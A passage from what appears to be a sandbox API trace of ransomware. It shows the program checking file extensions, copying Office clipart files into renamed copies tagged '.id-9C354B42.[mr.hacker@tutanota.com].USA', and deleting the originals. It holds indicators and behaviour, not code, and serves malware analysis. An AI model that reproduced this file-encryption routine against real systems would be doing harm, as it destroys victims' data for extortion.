lpString2="_.WMF") returned -1 [0057.685] lstrlenW (lpString=".ppt") returned 4 [0057.685] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0057.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 63 [0057.685] lstrlenW (lpString=".zip") returned 4 [0057.685] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0057.685] lstrlenW (lpString=".rar") returned 4 [0057.685] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0057.685] lstrlenW (lpString=".bz2") returned 4 [0057.685] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0057.685] lstrlenW (lpString=".7z") returned 3 [0057.685] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0057.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 63 [0057.685] lstrlenW (lpString=".dbf") returned 4 [0057.685] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0057.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 63 [0057.685] lstrlenW (lpString=".1cd") returned 4 [0057.685] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0057.685] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00148_.WMF") returned 63 [0057.685] lstrlenW (lpString=".jpg") returned 4 [0057.685] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0057.686] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=1516) returned 1 [0057.686] CloseHandle (hObject=0x22c) returned 1 [0057.686] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00152_.wmf")) returned 0x20 [0057.686] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00152_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0057.686] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00152_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0057.686] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.686] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0057.686] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00152_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0057.686] GetLastError () returned 0x0 [0057.686] ReadFile (in: hFile=0x22c, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x5ec, lpOverlapped=0x0) returned 1 [0057.993] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x5f0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x5f0, lpOverlapped=0x0) returned 1 [0058.012] ReadFile (in: hFile=0x22c, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0058.012] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0058.012] SetEndOfFile (hFile=0x1c8) returned 1 [0058.012] CloseHandle (hObject=0x1c8) returned 1 [0058.012] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0058.013] SetEndOfFile (hFile=0x22c) returned 1 [0058.013] CloseHandle (hObject=0x22c) returned 1 [0058.013] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0058.013] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00152_.wmf")) returned 1 [0058.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 63 [0058.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 63 [0058.014] lstrlenW (lpString=".doc") returned 4 [0058.014] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0058.014] lstrlenW (lpString=".docx") returned 5 [0058.014] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0058.014] lstrlenW (lpString=".pdf") returned 4 [0058.014] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0058.014] lstrlenW (lpString=".xls") returned 4 [0058.014] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0058.014] lstrlenW (lpString=".xlsx") returned 5 [0058.014] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0058.014] lstrlenW (lpString=".ppt") returned 4 [0058.014] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0058.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 63 [0058.014] lstrlenW (lpString=".zip") returned 4 [0058.014] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0058.014] lstrlenW (lpString=".rar") returned 4 [0058.014] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0058.014] lstrlenW (lpString=".bz2") returned 4 [0058.014] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0058.014] lstrlenW (lpString=".7z") returned 3 [0058.014] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0058.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 63 [0058.014] lstrlenW (lpString=".dbf") returned 4 [0058.014] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0058.014] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 63 [0058.014] lstrlenW (lpString=".1cd") returned 4 [0058.015] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0058.015] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00152_.WMF") returned 63 [0058.015] lstrlenW (lpString=".jpg") returned 4 [0058.015] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0058.015] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=812) returned 1 [0058.015] CloseHandle (hObject=0x22c) returned 1 [0058.015] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00296_.wmf")) returned 0x20 [0058.015] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00296_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0058.015] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00296_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0058.015] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0058.015] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0058.016] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00296_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0058.016] GetLastError () returned 0x0 [0058.016] ReadFile (in: hFile=0x22c, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x32c, lpOverlapped=0x0) returned 1 [0058.018] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x330, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x330, lpOverlapped=0x0) returned 1 [0058.025] ReadFile (in: hFile=0x22c, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0058.025] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0058.025] SetEndOfFile (hFile=0x1c8) returned 1 [0058.025] CloseHandle (hObject=0x1c8) returned 1 [0058.025] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0058.025] SetEndOfFile (hFile=0x22c) returned 1 [0058.026] CloseHandle (hObject=0x22c) returned 1 [0058.026] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0058.026] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00296_.wmf")) returned 1 [0058.026] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 63 [0058.026] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 63 [0058.026] lstrlenW (lpString=".doc") returned 4 [0058.026] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0058.026] lstrlenW (lpString=".docx") returned 5 [0058.026] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0058.027] lstrlenW (lpString=".pdf") returned 4 [0058.027] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0058.027] lstrlenW (lpString=".xls") returned 4 [0058.027] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0058.027] lstrlenW (lpString=".xlsx") returned 5 [0058.027] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0058.027] lstrlenW (lpString=".ppt") returned 4 [0058.027] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0058.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 63 [0058.027] lstrlenW (lpString=".zip") returned 4 [0058.027] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0058.027] lstrlenW (lpString=".rar") returned 4 [0058.027] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0058.027] lstrlenW (lpString=".bz2") returned 4 [0058.027] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0058.027] lstrlenW (lpString=".7z") returned 3 [0058.027] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0058.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 63 [0058.027] lstrlenW (lpString=".dbf") returned 4 [0058.027] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0058.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 63 [0058.027] lstrlenW (lpString=".1cd") returned 4 [0058.027] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0058.027] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00296_.WMF") returned 63 [0058.027] lstrlenW (lpString=".jpg") returned 4 [0058.027] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0058.028] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=13102) returned 1 [0058.028] CloseHandle (hObject=0x22c) returned 1 [0058.028] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00390_.wmf")) returned 0x20 [0058.028] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00390_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0058.028] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00390_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0058.029] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0058.029] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0058.029] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00390_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0058.029] GetLastError () returned 0x0 [0058.029] ReadFile (in: hFile=0x22c, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x332e, lpOverlapped=0x0) returned 1 [0058.030] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x3330, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x3330, lpOverlapped=0x0) returned 1 [0058.032] ReadFile (in: hFile=0x22c, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0058.032] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0058.032] SetEndOfFile (hFile=0x1c8) returned 1 [0058.032] CloseHandle (hObject=0x1c8) returned 1 [0058.032] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0058.032] SetEndOfFile (hFile=0x22c) returned 1 [0058.033] CloseHandle (hObject=0x22c) returned 1 [0058.033] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0058.033] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00390_.wmf")) returned 1 [0058.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 63 [0058.033] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 63 [0058.033] lstrlenW (lpString=".doc") returned 4 [0058.033] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0058.033] lstrlenW (lpString=".docx") returned 5 [0058.034] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0058.034] lstrlenW (lpString=".pdf") returned 4 [0058.034] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0058.034] lstrlenW (lpString=".xls") returned 4 [0058.034] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0058.034] lstrlenW (lpString=".xlsx") returned 5 [0058.034] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0058.034] lstrlenW (lpString=".ppt") returned 4 [0058.034] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0058.034] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 63 [0058.034] lstrlenW (lpString=".zip") returned 4 [0058.034] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0058.034] lstrlenW (lpString=".rar") returned 4 [0058.034] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0058.034] lstrlenW (lpString=".bz2") returned 4 [0058.034] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0058.034] lstrlenW (lpString=".7z") returned 3 [0058.034] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0058.034] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 63 [0058.034] lstrlenW (lpString=".dbf") returned 4 [0058.034] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0058.034] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 63 [0058.034] lstrlenW (lpString=".1cd") returned 4 [0058.034] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0058.034] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00390_.WMF") returned 63 [0058.034] lstrlenW (lpString=".jpg") returned 4 [0058.034] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0058.035] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=27050) returned 1 [0058.035] CloseHandle (hObject=0x22c) returned 1 [0058.035] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00392_.wmf")) returned 0x20 [0058.035] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00392_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0058.035] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00392_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0058.035] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0058.035] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0058.035] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00392_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c8 [0058.035] GetLastError () returned 0x0 [0058.035] ReadFile (in: hFile=0x22c, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x69aa, lpOverlapped=0x0) returned 1 [0058.037] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0x69b0, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0x69b0, lpOverlapped=0x0) returned 1 [0058.038] ReadFile (in: hFile=0x22c, lpBuffer=0x3510020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2cafed4, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesRead=0x2cafed4*=0x0, lpOverlapped=0x0) returned 1 [0058.039] WriteFile (in: hFile=0x1c8, lpBuffer=0x3510020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2cafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3510020*, lpNumberOfBytesWritten=0x2cafc9c*=0xec, lpOverlapped=0x0) returned 1 [0058.039] SetEndOfFile (hFile=0x1c8) returned 1 [0058.039] CloseHandle (hObject=0x1c8) returned 1 [0058.039] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0058.039] SetEndOfFile (hFile=0x22c) returned 1 [0058.040] CloseHandle (hObject=0x22c) returned 1 [0058.040] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x20) returned 1 [0058.040] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00392_.wmf")) returned 1 [0058.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 63 [0058.040] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 63 [0058.040] lstrlenW (lpString=".doc") returned 4 [0058.040] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0058.040] lstrlenW (lpString=".docx") returned 5 [0058.040] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0058.040] lstrlenW (lpString=".pdf") returned 4 [0058.040] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0058.040] lstrlenW (lpString=".xls") returned 4 [0058.040] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0058.040] lstrlenW (lpString=".xlsx") returned 5 [0058.040] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0058.041] lstrlenW (lpString=".ppt") returned 4 [0058.041] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0058.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 63 [0058.041] lstrlenW (lpString=".zip") returned 4 [0058.041] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0058.041] lstrlenW (lpString=".rar") returned 4 [0058.041] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0058.041] lstrlenW (lpString=".bz2") returned 4 [0058.041] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0058.041] lstrlenW (lpString=".7z") returned 3 [0058.041] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0058.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 63 [0058.041] lstrlenW (lpString=".dbf") returned 4 [0058.041] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0058.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 63 [0058.041] lstrlenW (lpString=".1cd") returned 4 [0058.041] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0058.041] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00392_.WMF") returned 63 [0058.041] lstrlenW (lpString=".jpg") returned 4 [0058.041] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0058.041] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x2caff1c | out: lpFileSize=0x2caff1c*=6996) returned 1 [0058.041] CloseHandle (hObject=0x22c) returned 1 [0058.042] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00524_.wmf")) returned 0x20 [0058.042] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00524_.wmf.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0058.042] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\BL00524_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\bl00524_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0058.042] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0058.042] SetFilePointerEx (in: hFile=0x22c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2cafec8 | out: lpNewFilePointer=0x0) returned 1 [0058.042] CreateFileW (lpFileName="C:\\Program Files\\Microsoft 